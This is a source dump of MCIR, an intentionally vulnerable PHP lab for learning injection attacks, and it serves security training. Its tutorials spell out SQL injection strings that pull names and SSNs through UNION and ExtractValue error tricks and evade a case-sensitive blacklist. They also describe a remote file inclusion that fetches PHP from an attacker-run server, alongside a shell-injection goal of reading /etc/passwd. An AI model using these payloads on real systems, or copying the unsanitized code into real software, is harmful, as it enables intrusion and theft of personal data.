46 | -------------------------------------------------------------------------------- /cryptomg/index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | header('Location: chosenpt.php'); 15 | 16 | ?> 17 | -------------------------------------------------------------------------------- /cryptomg/style.css: -------------------------------------------------------------------------------- 1 | html,body{ 2 | margin: 0; 3 | } 4 | 5 | #settings{ 6 | text-align: center; 7 | background: #E1E100; 8 | width: 100%; 9 | height: 25px; 10 | } 11 | 12 | #footer{ 13 | position: absolute; 14 | bottom: 0; 15 | background: #000000; 16 | height: 50px; 17 | width: 100%; 18 | color: #FFF; 19 | text-align: center; 20 | } 21 | 22 | #content{ 23 | margin-left: 150px; 24 | margin-top: -75px; 25 | margin-right: 50px; 26 | min-height: 500px; 27 | } 28 | 29 | #nav{ 30 | margin-top: 50px; 31 | } 32 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | mysqldb: 2 | image: mysql 3 | environment: 4 | - MYSQL_ROOT_PASSWORD=mcirpass00112233 5 | - MYSQL_DATABASE=sqlol 6 | 7 | mcir: 8 | image: andresriancho/mcir:latest 9 | ports: 10 | - "8090:80" 11 | links: 12 | - mysqldb 13 | environment: 14 | - APACHE_RUN_USER=www-data 15 | - APACHE_RUN_GROUP=www-data 16 | - APACHE_LOG_DIR=/var/log/apache2/ 17 | 18 | -------------------------------------------------------------------------------- /includes/environ.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | 15 | //Random failure. If enabled, script will die 10% of the time. 16 | //This simulates a buggy application and highlights the issue with boolean-based blind injection. 17 | if(isset($_REQUEST['random_failure'])){ 18 | if(rand(1,10)==10){ 19 | die('
Uh, wait, what was I doing?'); 20 | } 21 | } 22 | 23 | //Random delay. If enabled, script will pause execution up to ten seconds. 24 | //This simulates network latency and highlights the problem with time-based blind injection. 25 | if(isset($_REQUEST['random_delay'])){ 26 | sleep(rand(0,10)); 27 | } 28 | 29 | ?> 30 | -------------------------------------------------------------------------------- /includes/mcir.css: -------------------------------------------------------------------------------- 1 | /* 2 | Magical Code Injection Rainbow - A set of configurable injection testbeds 3 | Daniel "unicornFurnace" Crowley 4 | Copyright (C) 2014 Trustwave Holdings, Inc. 5 | 6 | This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 7 | 8 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 9 | 10 | You should have received a copy of the GNU General Public License along with this program. If not, see . 11 | */ 12 | 13 | body{ 14 | background-color:#328563; 15 | color:#122356; 16 | font-family:"Arial","Verdana"; 17 | } 18 | 19 | h1,b{ 20 | font-family:"Courier"; 21 | color:#111111; 22 | } 23 | 24 | table{ 25 | width:100%; 26 | } 27 | 28 | form{ 29 | padding:10px; 30 | background-color:#d0d0d0; 31 | margin-left:auto; 32 | margin-right:auto; 33 | width:60%; 34 | } 35 | 36 | #submit{ 37 | margin-left:auto; 38 | margin-right:auto; 39 | } 40 | 41 | #results{ 42 | padding:10px; 43 | border-style:dashed; 44 | margin-left:auto; 45 | margin-right:auto; 46 | width:60%; 47 | background-color:#d0d0d0; 48 | } 49 | 50 | #challenge{ 51 | padding:10px; 52 | margin-left:auto; 53 | margin-right:auto; 54 | width:60%; 55 | background-color:#d0d0d0; 56 | } 57 | 58 | #mcirnav{ 59 | font-size:150%; 60 | } 61 | 62 | a:visited{ 63 | color:#0000e4; 64 | } 65 | -------------------------------------------------------------------------------- /includes/mcir.nav.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 |
|SQLol||XMLmao||ShelLOL||XSSmh||CryptOMG||RFIdk||PHPwn|
16 | -------------------------------------------------------------------------------- /includes/mcir.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/includes/mcir.png -------------------------------------------------------------------------------- /index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | header('Location: splash/index.php'); 15 | 16 | ?> 17 | -------------------------------------------------------------------------------- /phpwn/challenges.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | include_once('includes/branding.php'); 15 | $mcir['page_name'] = 'Challenges'; 16 | ?> 17 | 18 | 19 | <?php echo $mcir['name'];?> - Challenges 20 | 21 | 22 | 23 |

- Challenges


24 | 25 |
26 |
27 |
28 |
29 | Nothing here yet... 30 |
31 |
32 | 33 | 34 | -------------------------------------------------------------------------------- /phpwn/challenges/tutorial0.txt: -------------------------------------------------------------------------------- 1 | TODO: Write a tutorial on how to complete the challenge 2 | -------------------------------------------------------------------------------- /phpwn/includes/branding.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /phpwn/includes/nav.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 |
16 | | PHP eval injection || Challenges | 17 |
18 | 19 |
20 |
21 |
22 |
23 | -------------------------------------------------------------------------------- /phpwn/index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | header('Location: eval.php'); 15 | 16 | ?> 17 | -------------------------------------------------------------------------------- /rfidk/INSTALL: -------------------------------------------------------------------------------- 1 | Set allow_url_fopen to "On" in your PHP ini file. 2 | -------------------------------------------------------------------------------- /rfidk/challenges.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | include_once('includes/branding.php'); 15 | $mcir['page_name'] = 'Challenges'; 16 | ?> 17 | 18 | 19 | <?php echo $mcir['name'];?> - Challenges 20 | 21 | 22 | 23 |

- Challenges


24 | 25 |
26 |
27 |
28 |
29 | Challenge 0 - http://hello.com/world.php
30 |
31 |
32 | 33 | 34 | -------------------------------------------------------------------------------- /rfidk/challenges/tutorial0.txt: -------------------------------------------------------------------------------- 1 | Challenge 0 - http://hello.com/world.php 2 | 3 | In this challenge, you must provide a URI pointing to a file containing PHP code that runs phpinfo(). We can use our own web server to achieve this. First, we write a quick PHP script: 4 | 5 | $ mkdir evil_files 6 | $ cat > evil_files/phpinfo.txt 7 | 10 | 11 | Next, we need to serve the file. Python has a built in web server module we can use for this. 12 | 13 | $ cd evil_files 14 | $ python -m SimpleHTTPServer 15 | Serving HTTP on 0.0.0.0 port 8000 ... 16 | 17 | Now we just need to point our vulnerable script at our attacking system, with the following URI: 18 | 19 | http://:8000/phpinfo.txt 20 | -------------------------------------------------------------------------------- /rfidk/includes/branding.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /rfidk/includes/nav.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 |
16 | | File Inclusion || Challenges | 17 |
18 | 19 |
20 |
21 |
22 |
23 | -------------------------------------------------------------------------------- /rfidk/index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | header('Location: include.php'); 15 | 16 | ?> 17 | -------------------------------------------------------------------------------- /rfidk/pages/date.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /shellol/challenges.htm: -------------------------------------------------------------------------------- 1 | 12 | 13 | 14 | ShellOL - Challenges 15 | 16 | 17 | 18 |

ShellOL - Challenges


19 |
| Shell Command Injection || Challenges |
20 |
21 |
22 |
23 |
24 | Challenge 0 - ;echo Hello world
25 | Challenge 1 - Only semi-effective
26 | Challenge 2 - Only semi-effective pt 2
27 | Challenge 3 - Only semi-effective pt 3
28 | Challenge 4 - Environmentalism
29 | Challenge 5 - The failure of quote filters
30 | Challenge 6 - Best laid plans
31 |
32 |
33 | 34 | 35 | -------------------------------------------------------------------------------- /shellol/challenges/challenge0.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | 17 | ShellOL - Challenge 0 - ; echo Hello world 18 | 19 | 20 | 21 |

ShellOL - Challenge 0 - ; echo Hello world


22 | 23 |
24 |
25 |
26 |
27 | 28 | You must perform the simplest of shell command injection attacks.
29 |
30 | Your objective is to read the contents of either /etc/passwd or C:\boot.ini, depending on your OS. 31 | 32 | 
33 | PARAMETERS:
34 | Injection Location - Command argument
35 | Method - GET
36 | Sanitization - None
37 | Output - output shown, error status disclosed, command shown
38 |
39 | 40 |
41 |
42 | 43 | 44 | 45 | 46 | Injection String:
47 | 48 |
49 |
50 | 51 | 52 | -------------------------------------------------------------------------------- /shellol/includes/nav.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 |
16 | | Shell Command Injection || Challenges | 17 |
18 | 19 |
20 |
21 |
22 |
23 | -------------------------------------------------------------------------------- /shellol/index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | header('Location: shell.php'); 15 | 16 | ?> 17 | -------------------------------------------------------------------------------- /splash/index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | The Magical Code Injection Rainbow! 17 | 18 | 19 | 20 |

Magical Code Injection Rainbow


21 |
22 | Welcome to the Magical Code Injection Rainbow!
23 |
24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /sqlol/challenges/challenge0.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | SQLol - Challenge 0 - Hello, world! 17 | 18 | 19 | 20 |

SQLol - Challenge 0 - Hello, world!


21 | 22 |
23 |
24 |
25 |
26 | 27 | You must perform the simplest of SQL injection attacks.
28 |
29 | Your objective is to get the query to return all usernames instead of just one. 30 | 31 | 
32 | PARAMETERS:
33 | Query Type - SELECT query
34 | Injection Type - String value in WHERE clause
35 | Method - GET
36 | Sanitization - None
37 | Output - All results, verbose error messages, query shown
38 |
39 | 40 |
41 |
42 | 43 | 44 | 45 | 46 | Injection String:
47 | 48 |
49 |
50 | 51 | 52 | -------------------------------------------------------------------------------- /sqlol/challenges/challenge1.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | SQLol - Challenge 1 - SQL Injection 101 17 | 18 | 19 | 20 |

SQLol - Challenge 1 - SQL Injection 101


21 | 22 |
23 |
24 |
25 |
26 | 27 | You must perform a very basic SQL injection attack.
28 |
29 | Your objective is to find the table of social security numbers present in the database and extract its information. 30 | 31 | 
32 | PARAMETERS:
33 | Query Type - SELECT query
34 | Injection Type - String value in WHERE clause
35 | Method - GET
36 | Sanitization - None
37 | Output - All results, verbose error messages, query shown
38 |
39 | 40 |
41 |
42 | 43 | 44 | 45 | 46 | Injection String:
47 | 48 |
49 |
50 | 51 | 52 | -------------------------------------------------------------------------------- /sqlol/challenges/tutorial0.txt: -------------------------------------------------------------------------------- 1 | SQLol Challenge 0 - Hello, world! 2 | ==================== 3 | (Note: These tutorials assume a basic knowledge of SQL. If you are unfamiliar with SQL, please visit http://www.w3schools.com/sql/default.asp) 4 | One of the most basic forms of SQL Injection modifies a query to return all results by effectively removing a WHERE clause. If a SQL query has a WHERE clause with two conditions separated by an OR keyword where one is a tautology (a statement that is always true such as 'a'='a') the first condition is essentially useless, as the second condition always evaluates to true, meaning that the WHERE clause might as well not be there. 5 | 6 | Our SQL query looks like this initially: 7 | SELECT username FROM users WHERE username = 'OUR_INPUT_HERE' GROUP BY username ORDER BY username ASC 8 | 9 | If the query looked like the following, we would retrieve all usernames from the database, not just the one named "myuser": 10 | SELECT username FROM users WHERE username = 'myuser' or 'a'='a' GROUP BY username ORDER BY username ASC 11 | 12 | If we place a single quote into our injection string as such: 13 | myuser' 14 | 15 | Our SQL query looks like this and is syntactically incorrect due to unmatched single quotes, resulting in an error: 16 | SELECT username FROM users WHERE username = 'myuser'' GROUP BY username ORDER BY username ASC 17 | 18 | Our input is not sanitized before being placed in an SQL query, and so we can modify the query as we like. In order to turn our initial query into the one which returns all users, we can use the following string: 19 | 20 | myuser' or 'a'='a 21 | 22 | When you perform this attack, note the resulting query shown. Your injection portion is underlined to highlight how your input modified the query without losing sight of the form the query was initially intended to take. 23 | -------------------------------------------------------------------------------- /sqlol/challenges/tutorial3.txt: -------------------------------------------------------------------------------- 1 | SQLol Challenge 3 - Death Row 2 | ============================ 3 | This challenge is nearly identical to Challenge 1, but with one important difference: Only one row of data is returned at a time. 4 | 5 | We already learned how to use the UNION keyword to pull data from other locations. Next, we must learn how to pull a set of results, one row of data at a time. There are a few different ways to do this. 6 | 7 | MySQL 8 | -------- 9 | The LIMIT and OFFSET keywords can be used to pull a specific number of records from a database beginning at a certain offset from the beginning of the initial result set. For instance, if we wanted to pull two user records starting at the third record in our initial result set, we might use the following query: 10 | 11 | SELECT * FROM users LIMIT 2 OFFSET 2 12 | 13 | We can use these keywords to pull one row and iterate through all results one by one. One drawback to the LIMIT and OFFSET keywords is that they must appear after GROUP BY and ORDER BY keywords, which are at the end of our initial query. As such, we comment out the end using a space and a hash ( #). The injection strings we would use for MySQL to pull the names and social security numbers from the ssn table would be like the following: 14 | 15 | ' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 0 # 16 | ' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 1 # 17 | ... 18 | -------------------------------------------------------------------------------- /sqlol/challenges/tutorial4.txt: -------------------------------------------------------------------------------- 1 | SQLol Challenge 4 - War on Error 2 | ================================ 3 | In this challenge, we do not see any of the result set. What we DO see is verbose error messages. While some would mistakenly assume that this is a blind SQL injection challenge, data extraction can be achieved without the use of blind SQL injection techniques. Certain error messages will disclose information pulled from the database. 4 | 5 | MySQL 6 | ----- 7 | The "ExtractValue" function in MySQL runs an XPath query against a string representing XML data. The function takes input in the following form: 8 | 9 | ExtractValue('xmldatahere', 'xpathqueryhere') 10 | 11 | If the XPath query is syntactically incorrect, we are presented with an error message: 12 | 13 | XPATH syntax error: 'xpathqueryhere' 14 | 15 | Provided that they return a single string value, we can replace strings with select queries surrounded by parentheses, hereafter referred to as "subselects". We can call ExtractValue() in our injection string, and replace the xpath query parameter with a subselect. If the data returned is not a valid xpath query, the data will be revealed in the error message we receive. We can force this to be the case using the concat() function to preface the xpath query with an invalid character, which will cause syntax errors. 16 | 17 | We can pull each row from the ssn table using these injection strings: 18 | 19 | ' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 0)))='a 20 | ' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 1)))='a 21 | ... 22 | -------------------------------------------------------------------------------- /sqlol/challenges/tutorial6.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/sqlol/challenges/tutorial6.txt -------------------------------------------------------------------------------- /sqlol/challenges/tutorial7.txt: -------------------------------------------------------------------------------- 1 | SQLol Challenge 7 - Walking on Thin Ice 2 | ================================= 3 | Not every SQL injection flaw manifests in a SELECT query. When working with an INSERT, UPDATE, or DELETE query, one must be very careful: The wrong input can cause catastrophic damage to the contents of a database. If you use "' or 1=1--" as a string to detect SQL injection in an application and you find one in the WHERE clause of a DELETE query, you might as well have just dropped the table. 4 | 5 | This is our task here: 6 | -------------------------------------------------------------------------------- /sqlol/challenges/tutorial8.txt: -------------------------------------------------------------------------------- 1 | SQLol Challenge 8 - Black Comedy 2 | ==================== 3 | If you've been in information security long enough, you've heard that blacklisting is bad. In "Black Comedy", our task is to evade a particularly primitive blacklist filter. 4 | 5 | The filter removes the following keywords: 6 | union,select,where,and,or,--,# 7 | 8 | There is a fatal flaw in the way that the blacklist filter is implemented: It filters case sensitively. As such, we can use keywords like "union" and "select" by using altered case. For instance, we can use "uNion" and avoid filtering. We can't change the case of our comment delimiters (the "--" and "#") so we'll need to avoid using the comment technique. This is simple, we can just use two union statements as we have seen in previous challenges. 9 | 10 | Here's an example of an attack string that will work: 11 | 12 | ' uNion seLect concat(name,':',ssn) from ssn uNion selEct null from users whEre username=' 13 | 14 | -------------------------------------------------------------------------------- /sqlol/challenges/tutorial9.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/sqlol/challenges/tutorial9.txt -------------------------------------------------------------------------------- /sqlol/custom.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | 17 | SQLol - Custom query 18 | 19 | 20 | 21 |

SQLol - Custom query


22 | 26 | 27 | Original Query (*INJECT* specifies injection point): 28 | 29 | 30 | 31 |
32 | 33 | ' . $_REQUEST['inject_string'] . '', $_REQUEST['location']); 42 | 43 | include('includes/database.inc.php'); 44 | 45 | } 46 | ?> 47 |
48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.idea/adodb.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.idea/copyright/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.idea/dictionaries/dregad.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | adodb 5 | mssql 6 | mssqlnative 7 | 8 | 9 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.idea/inspectionProfiles/Project_Default.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.idea/inspectionProfiles/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.mailmap: -------------------------------------------------------------------------------- 1 | Andreas Fernandez 2 | Mike Benoit MikeB 3 | Mike Benoit mike.benoit 4 | 5 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/adodb-iterator.inc.php: -------------------------------------------------------------------------------- 1 | Execute("select * from adoxyz"); 17 | foreach($rs as $k => $v) { 18 | echo $k; print_r($v); echo "
"; 19 | } 20 | 21 | 22 | Iterator code based on http://cvs.php.net/cvs.php/php-src/ext/spl/examples/cachingiterator.inc?login=2 23 | 24 | 25 | Moved to adodb.inc.php to improve performance. 26 | */ 27 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/adodb-php4.inc.php: -------------------------------------------------------------------------------- 1 | =5.3.2" 31 | }, 32 | 33 | "autoload" : { 34 | "files" : ["adodb.inc.php"] 35 | } 36 | 37 | } 38 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/cute_icons_for_site/adodb.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/sqlol/includes/adodb/cute_icons_for_site/adodb.gif -------------------------------------------------------------------------------- /sqlol/includes/adodb/cute_icons_for_site/adodb2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/sqlol/includes/adodb/cute_icons_for_site/adodb2.gif -------------------------------------------------------------------------------- /sqlol/includes/adodb/datadict/datadict-ibase.inc.php: -------------------------------------------------------------------------------- 1 | debug) ADOConnection::outp("AlterColumnSQL not supported"); 57 | return array(); 58 | } 59 | 60 | 61 | function DropColumnSQL($tabname, $flds, $tableflds='', $tableoptions='') 62 | { 63 | if ($this->debug) ADOConnection::outp("DropColumnSQL not supported"); 64 | return array(); 65 | } 66 | 67 | } 68 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/docs/README.md: -------------------------------------------------------------------------------- 1 | # ADOdb Documentation 2 | 3 | ADOdb documentation is available in the following locations 4 | 5 | - [Online](http://adodb.org/) 6 | - [Download](https://sourceforge.net/projects/adodb/files/Documentation/) for offline use 7 | 8 | ## Legacy documentation 9 | 10 | The old HTML files are available in 11 | [GitHub](https://github.com/ADOdb/ADOdb/tree/8b8133771ecbe9c95e57abbe5dc3757f0226bfcd/docs), 12 | or in the release zip/tarballs for version 5.20 and before on 13 | [Sourceforge](https://sourceforge.net/projects/adodb/files/adodb-php5-only/). 14 | 15 | ## Changelog 16 | 17 | The full historical [Changelog](changelog.md) is available on GitHub. 18 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/docs/adodb.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/sqlol/includes/adodb/docs/adodb.gif -------------------------------------------------------------------------------- /sqlol/includes/adodb/docs/adodb2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/sqlol/includes/adodb/docs/adodb2.gif -------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-ado_access.inc.php: -------------------------------------------------------------------------------- 1 | = 5) include(ADODB_DIR."/drivers/adodb-ado5.inc.php"); 21 | else include(ADODB_DIR."/drivers/adodb-ado.inc.php"); 22 | } 23 | 24 | class ADODB_ado_access extends ADODB_ado { 25 | var $databaseType = 'ado_access'; 26 | var $hasTop = 'top'; // support mssql SELECT TOP 10 * FROM TABLE 27 | var $fmtDate = "#Y-m-d#"; 28 | var $fmtTimeStamp = "#Y-m-d h:i:sA#";// note no comma 29 | var $sysDate = "FORMAT(NOW,'yyyy-mm-dd')"; 30 | var $sysTimeStamp = 'NOW'; 31 | var $upperCase = 'ucase'; 32 | 33 | /*function BeginTrans() { return false;} 34 | 35 | function CommitTrans() { return false;} 36 | 37 | function RollbackTrans() { return false;}*/ 38 | 39 | } 40 | 41 | 42 | class ADORecordSet_ado_access extends ADORecordSet_ado { 43 | 44 | var $databaseType = "ado_access"; 45 | 46 | function __construct($id,$mode=false) 47 | { 48 | return parent::__construct($id,$mode); 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-informix.inc.php: -------------------------------------------------------------------------------- 1 | _has_mssql_init) { 36 | ADOConnection::outp( "PrepareSP: mssql_init only available since PHP 4.1.0"); 37 | return $sql; 38 | } 39 | if (is_string($sql)) $sql = str_replace('||','+',$sql); 40 | $stmt = mssql_init($sql,$this->_connectionID); 41 | if (!$stmt) return $sql; 42 | return array($sql,$stmt); 43 | } 44 | 45 | function _query($sql,$inputarr=false) 46 | { 47 | if (is_string($sql)) $sql = str_replace('||','+',$sql); 48 | return ADODB_mssql::_query($sql,$inputarr); 49 | } 50 | } 51 | 52 | class ADORecordset_mssqlpo extends ADORecordset_mssql { 53 | var $databaseType = "mssqlpo"; 54 | function __construct($id,$mode=false) 55 | { 56 | parent::__construct($id,$mode); 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-oci805.inc.php: -------------------------------------------------------------------------------- 1 | 0) { 39 | if ($offset > 0) $nrows += $offset; 40 | $sql = "select * from ($sql) where rownum <= $nrows"; 41 | $nrows = -1; 42 | } 43 | */ 44 | 45 | return ADOConnection::SelectLimit($sql,$nrows,$offset,$inputarr,$secs2cache); 46 | } 47 | } 48 | 49 | class ADORecordset_oci805 extends ADORecordset_oci8 { 50 | var $databaseType = "oci805"; 51 | function __construct($id,$mode=false) 52 | { 53 | parent::__construct($id,$mode); 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-odbtp_unicode.inc.php: -------------------------------------------------------------------------------- 1 | 14 | 15 | // security - hide paths 16 | if (!defined('ADODB_DIR')) die(); 17 | 18 | /* 19 | Because the ODBTP server sends and reads UNICODE text data using UTF-8 20 | encoding, the following HTML meta tag must be included within the HTML 21 | head section of every HTML form and script page: 22 | 23 | 24 | 25 | Also, all SQL query strings must be submitted as UTF-8 encoded text. 26 | */ 27 | 28 | if (!defined('_ADODB_ODBTP_LAYER')) { 29 | include(ADODB_DIR."/drivers/adodb-odbtp.inc.php"); 30 | } 31 | 32 | class ADODB_odbtp_unicode extends ADODB_odbtp { 33 | var $databaseType = 'odbtp'; 34 | var $_useUnicodeSQL = true; 35 | } 36 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-pdo_mssql.inc.php: -------------------------------------------------------------------------------- 1 | hasTransactions = false; ## <<< BUG IN PDO mssql driver 26 | $parentDriver->_bindInputArray = false; 27 | $parentDriver->hasInsertID = true; 28 | } 29 | 30 | function ServerInfo() 31 | { 32 | return ADOConnection::ServerInfo(); 33 | } 34 | 35 | function SelectLimit($sql,$nrows=-1,$offset=-1,$inputarr=false,$secs2cache=0) 36 | { 37 | $ret = ADOConnection::SelectLimit($sql,$nrows,$offset,$inputarr,$secs2cache); 38 | return $ret; 39 | } 40 | 41 | function SetTransactionMode( $transaction_mode ) 42 | { 43 | $this->_transmode = $transaction_mode; 44 | if (empty($transaction_mode)) { 45 | $this->Execute('SET TRANSACTION ISOLATION LEVEL READ COMMITTED'); 46 | return; 47 | } 48 | if (!stristr($transaction_mode,'isolation')) $transaction_mode = 'ISOLATION LEVEL '.$transaction_mode; 49 | $this->Execute("SET TRANSACTION ".$transaction_mode); 50 | } 51 | 52 | function MetaTables($ttype=false,$showSchema=false,$mask=false) 53 | { 54 | return false; 55 | } 56 | 57 | function MetaColumns($table,$normalize=true) 58 | { 59 | return false; 60 | } 61 | 62 | } 63 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-pdo_sqlsrv.inc.php: -------------------------------------------------------------------------------- 1 | hasTransactions = true; 16 | $parentDriver->_bindInputArray = true; 17 | $parentDriver->hasInsertID = true; 18 | $parentDriver->fmtTimeStamp = "'Y-m-d H:i:s'"; 19 | $parentDriver->fmtDate = "'Y-m-d'"; 20 | } 21 | 22 | function BeginTrans() 23 | { 24 | $returnval = parent::BeginTrans(); 25 | return $returnval; 26 | } 27 | 28 | function MetaColumns($table, $normalize = true) 29 | { 30 | return false; 31 | } 32 | 33 | function MetaTables($ttype = false, $showSchema = false, $mask = false) 34 | { 35 | return false; 36 | } 37 | 38 | function SelectLimit($sql, $nrows = -1, $offset = -1, $inputarr = false, $secs2cache = 0) 39 | { 40 | $ret = ADOConnection::SelectLimit($sql, $nrows, $offset, $inputarr, $secs2cache); 41 | return $ret; 42 | } 43 | 44 | function ServerInfo() 45 | { 46 | return ADOConnection::ServerInfo(); 47 | } 48 | 49 | } 50 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-postgres.inc.php: -------------------------------------------------------------------------------- 1 | GetOne("SELECT lastval()") 38 | : $this->GetOne("SELECT currval(pg_get_serial_sequence('$table', '$column'))"); 39 | } 40 | } 41 | 42 | class ADORecordSet_postgres8 extends ADORecordSet_postgres7 43 | { 44 | var $databaseType = "postgres8"; 45 | } 46 | 47 | class ADORecordSet_assoc_postgres8 extends ADORecordSet_assoc_postgres7 48 | { 49 | var $databaseType = "postgres8"; 50 | } 51 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-postgres9.inc.php: -------------------------------------------------------------------------------- 1 | 3 | $ADODB_LANG_ARRAY = array ( 4 | 'LANG' => 'ar', 5 | DB_ERROR => 'خطأ غير محدد', 6 | DB_ERROR_ALREADY_EXISTS => 'موجود مسبقا', 7 | DB_ERROR_CANNOT_CREATE => 'لا يمكن إنشاء', 8 | DB_ERROR_CANNOT_DELETE => 'لا يمكن حذف', 9 | DB_ERROR_CANNOT_DROP => 'لا يمكن حذف', 10 | DB_ERROR_CONSTRAINT => 'عملية إدخال ممنوعة', 11 | DB_ERROR_DIVZERO => 'عملية التقسيم على صفر', 12 | DB_ERROR_INVALID => 'غير صحيح', 13 | DB_ERROR_INVALID_DATE => 'صيغة وقت أو تاريخ غير صحيحة', 14 | DB_ERROR_INVALID_NUMBER => 'صيغة رقم غير صحيحة', 15 | DB_ERROR_MISMATCH => 'غير متطابق', 16 | DB_ERROR_NODBSELECTED => 'لم يتم إختيار قاعدة البيانات بعد', 17 | DB_ERROR_NOSUCHFIELD => 'ليس هنالك حقل بهذا الاسم', 18 | DB_ERROR_NOSUCHTABLE => 'ليس هنالك جدول بهذا الاسم', 19 | DB_ERROR_NOT_CAPABLE => 'قاعدة البيانات المرتبط بها غير قادرة', 20 | DB_ERROR_NOT_FOUND => 'لم يتم إيجاده', 21 | DB_ERROR_NOT_LOCKED => 'غير مقفول', 22 | DB_ERROR_SYNTAX => 'خطأ في الصيغة', 23 | DB_ERROR_UNSUPPORTED => 'غير مدعوم', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'عدد القيم في السجل', 25 | DB_ERROR_INVALID_DSN => 'DSN غير صحيح', 26 | DB_ERROR_CONNECT_FAILED => 'فشل عملية الإتصال', 27 | 0 => 'ليس هنالك أخطاء', // DB_OK 28 | DB_ERROR_NEED_MORE_DATA => 'البيانات المزودة غير كافية', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'لم يتم إيجاد الإضافة المتعلقة', 30 | DB_ERROR_NOSUCHDB => 'ليس هنالك قاعدة بيانات بهذا الاسم', 31 | DB_ERROR_ACCESS_VIOLATION => 'سماحيات غير كافية' 32 | ); 33 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-cn.inc.php: -------------------------------------------------------------------------------- 1 | 'cn', 6 | DB_ERROR => '未知错误', 7 | DB_ERROR_ALREADY_EXISTS => '已经存在', 8 | DB_ERROR_CANNOT_CREATE => '不能创建', 9 | DB_ERROR_CANNOT_DELETE => '不能删除', 10 | DB_ERROR_CANNOT_DROP => '不能丢弃', 11 | 